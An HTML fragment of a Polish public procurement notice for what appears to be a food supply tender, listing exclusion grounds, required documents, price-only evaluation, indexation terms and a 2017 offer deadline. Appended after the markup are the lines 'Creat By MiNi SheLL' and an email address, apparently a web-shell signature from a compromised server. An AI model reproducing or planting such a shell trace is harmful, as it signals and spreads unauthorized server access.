                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy, 
2) oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej- pod warunkiem ,ze wykonawca nie złożył oświadczenia w terminie 3 dni od zamieszczenia informacji z sesji otwarcia ofert.   </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1) dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego.  Warunek zostanie spełniony  jeśli Wykonawca przedstawi  polisę ubezpieczenia OC j (bądź inny dokument) od odpowiedzialności cywilnej (deliktowej i kontraktowej ) z rozszerzonym zakresem ubezpieczenia od odpowiedzialności cywilnej ubezpieczonego za szkody osobowe lub rzeczowe wyrządzone przez produkty dostarczone przez Wykonawcę na sumę ubezpieczenia minimum  wartości złożonej oferty<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br />Zamawiający nie przewiduje dialogu konkurencyjnego<br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br />Nie dootyczy<br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Sposób waloryzacji:
Waloryzacja cen jednostkowych i wartości brutto ogółem jest możliwa po upływie 6 miesięcy obowiązywania umowy  i jedynie o wskaźnik  wzrostu lub obniżenia  cen artykułów spożywczych ogłoszony przez GUS dla półrocznego okresu obowiązywania umowy.
1) Warunki:
- Wzrost lub obniżenie  cen musi być udokumentowany komunikatem GUS.
- Przekazany  pisemnie
- Wyliczenie zmian cen jednostkowych i różnic po waloryzacji.
- Data wprowadzenia nowych cen.
- Obopólnie podpisany aneks  zmieniający umowę.
2. Strony ustalają ,że wynagrodzenie należne wykonawcy wynikające z zapisów  § 14 umowy  podlega automatycznej waloryzacji odpowiednio o kwotę wzrostu lub obniżenia podatku VAT wynikającą ze stawki tego podatku obowiązującą w chwili powstania obowiązku podatkowego. W takim przypadku wysokość wynagrodzenia należnego wykonawcy ustalana jest każdorazowo z uwzględnieniem aktualnej stawki podatku VAT obowiązującej na dzień wystawienia faktury (powstania obowiązku podatkowego).
3. Zamawiający zastrzega sobie bez zmian umowy   możliwość odstąpienia od dostawy niektórych produktów na rzecz innych z zastrzeżeniem, że zmiana asortymentu w poszczególnych pozycjach nie  może przekroczyć + , -  20% ich ilości i wartości wskazanej w ofercie. 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 12/04/2017, godzina: 09:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Ustawodawca dopuszcza zastosowanie ceny powyżej 60 %  kiedy przedmiot zamówienia, jest powszechnie oferowany w ustalonym standardzie jakościowym i powszechnie dostępny. Tę powszechność należy odnieść do rynku oferującego dany typ zamawianego przedmiotu zamówienia, a więc możliwości realizacji zamówienia przez podmioty działające w danej branży. Ustalone standardy jakościowe wskazują na powtarzalny i typowy charakter rzeczy będących przedmiotem zamówienia który zamawiający dodatkowo opisał bardzo dokładnie w przedmiocie zamówienia, gdzie jedynym elementem odróżniającym jest cena. Inaczej wskazując, do kategorii zamówień powszechnie dostępnych o ustalonych standardach jakościowych możemy zaliczyć takie zamówienia, które poprzez swoją powszechność znane są przeciętnemu nabywcy, a przez szeroką dostępność ukształtowany jest ich standard, który dla przeciętnego klienta jest łatwy do zdefiniowania. </div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com